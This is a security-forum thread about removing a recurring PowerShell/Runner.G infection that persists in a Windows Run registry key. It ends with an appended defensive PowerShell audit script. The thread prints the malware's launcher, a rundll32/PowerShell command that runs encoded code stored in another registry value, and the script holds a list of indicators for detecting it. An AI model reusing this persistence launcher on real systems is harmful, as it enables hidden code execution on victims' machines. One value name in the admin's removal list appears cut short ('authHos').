PowerShell/Runner.G


Recommended Posts

This keeps showing up in one of our client machines in registry with the Registry scanner Detection engine 20939 (20200303) :

Hash 8ECE3FFE602D59D1E38F9506F5DA1FC280AADAF8

\REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

The ESMC says that it was "cleaned by deleting," but then it shows up a few hours later. Is there some way to identify a process that is reinserting this? Or what else should I do next?


14 minutes ago, Carl S said:

\REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

Did you manually check what's in that registry key? Display a screen shot of what's in the key.


10 minutes ago, itman said:

Did you manually check what's in that registry key? Display a screen shot of what's in the key.

When I search for that key I don't find it in regedit.


Search for:

HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run


16 hours ago, itman said:

Search for:

HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

Duh, didn't catch that, I just cut and pasted. Thanks.


OK, found it by navigating to it. Could not get search to work.

In the meantime, I have ESET client issues on that machine, probably due to my own fault. :(


50 minutes ago, Carl S said:

OK, found it by navigating to it.  Could not get search to work.

So was there anything present in that registry key?


The suspicious part seems to be:

key: authHost

value:
rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))


12 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Working on this. I killed off the ESET agent accidentally, while trying to uninstall the competitor's product that wasn't successfully uninstalled before installing the ESET agent. Now up and running again, and will get the logs. (Ok, it's collecting right now)

It's been years since I've submitted this type of logs, so remind me, do I attach them to the post, or send them in some other way? Seems like they may have some confidential stuff.


13 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Hmm. I get a message from the Log Collector that says "An error occurred during collection of files. See the log for more info."


1 hour ago, Carl S said:

The suspicious part seems to be:

key: authHost

value:
rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))

I would say it is malicious.

To be on the safe side, export the reg. key to a save location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it.

Note that authhost.exe is a legit Win system process, but that is obviously what is not running here.

Edited by itman

21 minutes ago, itman said:

I would say it is malicious.

To be on the safe side, export the reg. key to a save location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it.

Note that authhost.exe is a legit Win system process, but that is obviously what is not running here.

Am I deleting the whole key / value pair or the value and leaving the key?


14 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Marcos, I re-ran the collector on a whim, and this time, it worked. I now have the zip file ready.


44 minutes ago, Carl S said:

Am I deleting the whole key / value pair or the value and leaving the key?

I believe what is shown in your reg. key is this:

[screenshot: Eset_Reg_Malware.png]

BTW - when I tried to enter the rundll.exe code as data, Eset immediately detected it as the PowerShell malware detection you're receiving. Hence, it doesn't display in the screen shot.

Anyway, you will be deleting "authHost" which BTW is not a registry key. It is a String value. Deleting authHost will also remove any data associated with it which is the malicious code.

Edited by itman

Also check out this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E . This is what the PowerShell script was using.

Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself.

Edited by itman

  • Administrators
10 hours ago, Carl S said:

Marcos, I re-ran the collector on a whim, and this time, it worked. I now have the zip file ready.

You can upload it here, only ESET staff and the poster have access to attachments granted. Alternatively you can upload the archive to a safe location and drop me a personal message with a download link.


14 hours ago, itman said:

Also check out this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E . This is what the PowerShell script was using.

Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself.

I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item.


Just now, Carl S said:

I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item.

Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise.


12 minutes ago, itman said:

Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise.

Absolutely. For now, I'm holding off on any more changes until Marcos posts again to the thread. One of my main concerns was that the logs said ESET was cleaning by deleting repeatedly over several days, but clearly it was either not deleting or something was putting it back. For now, though, it's gone 16 hours or so without being re-detected and it is still not in the registry since manually removing it yesterday.


  • Administrators

Please delete the following registry values and then reboot the machine:
HKU\S-1-5-21-3146671537-2346468688-2395455220-1182\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\authHos
HKCU\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E\Auxibrkr

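The removal steps above are manual. As an added example (not code from the thread or from ESET), here is a PowerShell audit script in the same spirit: it walks the Run key of every loaded user hive under HKU, flags values that combine the indicators seen in this thread (rundll32 with ShellExec_RunDLL, a PowerShell iex, and a payload read from another registry path), exports the key with reg.exe before touching anything, and only removes a flagged value when -Remove is given. The backup folder, the indicator list and the three-indicator threshold are assumptions, not anything the thread states.

```powershell
# Added example: audit per-user Run keys for indirect launchers like the one in this thread.
param(
    [switch]$Remove,                                      # delete only when explicitly asked
    [string]$BackupDir = "$env:ProgramData\RunKeyAudit"   # assumed backup location
)

# Substrings that, taken together, describe the launcher discussed in the thread.
$indicators = @('rundll32', 'ShellExec_RunDLL', 'powershell', 'iex', 'Get-ItemProperty', 'AppDataLow')

New-Item -ItemType Directory -Path $BackupDir -Force | Out-Null

# HKU holds every loaded user hive (S-1-5-21-... SIDs); skip the *_Classes hives.
Get-ChildItem -Path 'Registry::HKEY_USERS' |
    Where-Object { $_.PSChildName -like 'S-1-5-21-*' -and $_.PSChildName -notlike '*_Classes' } |
    ForEach-Object {
        $sid    = $_.PSChildName
        $runKey = "Registry::HKEY_USERS\$sid\Software\Microsoft\Windows\CurrentVersion\Run"
        if (-not (Test-Path $runKey)) { return }

        $props = Get-ItemProperty -Path $runKey
        $names = $props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' } |
                 Select-Object -ExpandProperty Name
        foreach ($name in $names) {
            $data = [string]$props.$name
            $hits = @($indicators | Where-Object { $data -match [regex]::Escape($_) })
            if ($hits.Count -lt 3) { continue }   # assumed threshold: several indicators together

            # Which other registry path does the launcher pull its payload from?
            $referenced = [regex]::Match($data, 'HK(?:CU|LM|U):\\[^''")]+').Value

            [pscustomobject]@{
                SID = $sid; Value = $name; Indicators = ($hits -join ','); PayloadKey = $referenced
            } | Format-List

            # Export the whole Run key first so the change can be reverted with "reg.exe import".
            $stamp  = Get-Date -Format 'yyyyMMdd_HHmmss'
            $backup = Join-Path $BackupDir "Run_${sid}_$stamp.reg"
            reg.exe export "HKU\$sid\Software\Microsoft\Windows\CurrentVersion\Run" $backup /y | Out-Null

            if ($Remove) {
                Remove-ItemProperty -Path $runKey -Name $name
                Write-Host "Removed value '$name' from HKU\$sid Run key; backup at $backup"
            }
        }
    }
```

Run it from an elevated PowerShell so other users' hives are visible; the value it reports as PayloadKey is the second location Marcos asks to clear, which this script only reports and does not touch.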